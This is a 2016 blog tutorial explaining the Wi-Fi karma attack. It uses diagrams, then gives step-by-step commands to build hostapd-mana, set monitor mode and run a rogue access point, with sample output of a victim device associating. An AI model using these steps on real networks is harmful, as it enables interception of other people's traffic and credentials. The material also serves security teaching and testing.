12 Sep 2016, 19:09

Wireless Tricks

Wireless has been a great benefit to everyone, to the person drink coffee at their local coffee shop or the salesperson checking their emails. Security was an afterthought in the original design of 802.11 standards and thus lead to hackers being able to see and steal other individuals traffic.

In this post I will partially demonstrate how an average Joe can setup their wireless to either:

  • Sniff data (Man-in-the-Middle)
  • Steal your personal Active Directory password (NetNTLMv2)
  • Inject malicious code.

The above-mentioned list could be indefinite, as the hacker would have full control over a victim’s traffic going back and forth.

Lets start with a simple one, namely the Karma Attack.

Karma Attack

The concept of a karma attack is pretty simple, let’s take a look at the below diagram:

                                    Normal Probe Request


                             Probe Request: My Home Wifi
    Broadcasts probes        Probe Request: Work Wifi               Listens for probes
    +------------------+     Probe Request: Coffeshop Wifi         +-------------------+
    |                  +------------------------------------------->        Home       |
    |  Phone / Laptop  |                                           |  Wireless Router  |
    |                  <-------------------------------------------+                   |
    +------------------+      Probe Response: My Home Wifi         +-------------------+
    Listens for beacons       Beacon:         My Home Wifi          Broadcasts beacons

In the above-mentioned diagram, a user’s phone/laptop at home will continuously probe for access points, which the user has previously connected to, namely:

Probe Request: My Home Wifi
Probe Request: Work Wifi
Probe Request: Coffeshop Wifi

The wireless router at the home, will receive the probe request My Home Wifi and say "Hello, I'm here!".

This is where the initial handshake / DHCP lease etc. takes place, and the user will be connected to their home network.

An attacker could take advantage of this design, take the following diagram into consideration:

                     Probe Request: My Home Wifi
 Broadcasts probes   Probe Request: Work Wifi        Listens for probes                Listens for probes
+------------------+ Probe Request: Coffeshop Wifi +---------------------+           +-------------------+
|                  +------------------------------->                     +----------->    Coffee shop    |
|  Phone / Laptop  |                               |  Hacker's Karma AP  |  Traffic  |  Wireless Router  |
|                  <-------------------------------+                     <-----------+                   |
+------------------+ Probe Response: My Home Wifi  +---------------------+           +-------------------+
 Listens for beacons Beacon:         My Home Wifi    Broadcasts Beackins               Broadcasts Beackins

Let’s say, a user is sitting at a local coffee shop. Mr hacker had set up a karma access point in this coffee shop. What this means is, the user’s device will now probe for the access points stored on his device.

The attacker’s access point will respond on either of those requests, and make the user’s device connect thinking that it is actually the legitimate access point, and in the above-mentioned case, the user (at the local coffee shop) connected to their My Home Wifi

The attacker could now forward all the user’s traffic via the coffee shop network while having full access to the user’s traffic.

Karma Setup

The Gear

  • TP-LINK TL-WN722N
  • Alpha ARS-N19 omni directional 9 dBi antenna
  • Kali VM

Let’s set up our own karma access point, I will make use of the Sensepost MANA toolkit for this (Thanks to Sensepost for this repo):

git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana/hostapd && make

The above commands will clone the hostapd-mana git repository, and compile the hostapd executable for you.

Once this is done, it is time to set up the wireless adapter on the Kali Virtual Machine.

Insert your wireless adapter and type the following in your terminal:

iwconfig

This should print out your currently active wireless interfaces, below is an example of what it could look like:

[root@kali]$ iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0 is my TP-Link adapter, which I will be using for this attack, yours might be wlan1 etc, just remember the interface name.

Next we need to put the wlan0 interface into monitor mode, with the following commands:

airmon-ng check kill
airmon-ng start wlan0

This will create a new interface, that is in monitor state, to verify we can run iwconfig again.

[root@kali]$ iwconfig
wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

As you can see, my wireless interface name has changed to wlan0mon, don’t be alarmed if yours is something like mon0.

Copy the name of the wireless interface, and open the config file called hostapd.config with your prefered text editor, and make the following changes:

  • Change the following line: interface=wlan0 to interface=wlan0mon obviously with the interface name you have copied.
  • Change the ssid=test (Line: 111) to a more desired, I will make mine ssid=Free Wifi

Running hostapd

Type the following to start the karma attack:

./hostapd hostapd.conf

Sample output could be as follows:

[root@kali]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED

As you can see, we now have an access point broadcasting the ssid name Free Wifi, but whenever a probe request from a victim is received, hostapd will respond to that probe request so that a victim could connect to our access point.

The below output shows a successful connection to our karma access point:

[root@winter hostapd (master ✗)]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: authenticated
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: associated (aid 1)
wlan0mon: AP-STA-CONNECTED 6c:72:e7:98:9e:22
MANA - Successful association of 6c:72:e7:98:9e:22 to ESSID 'My Home Wifi'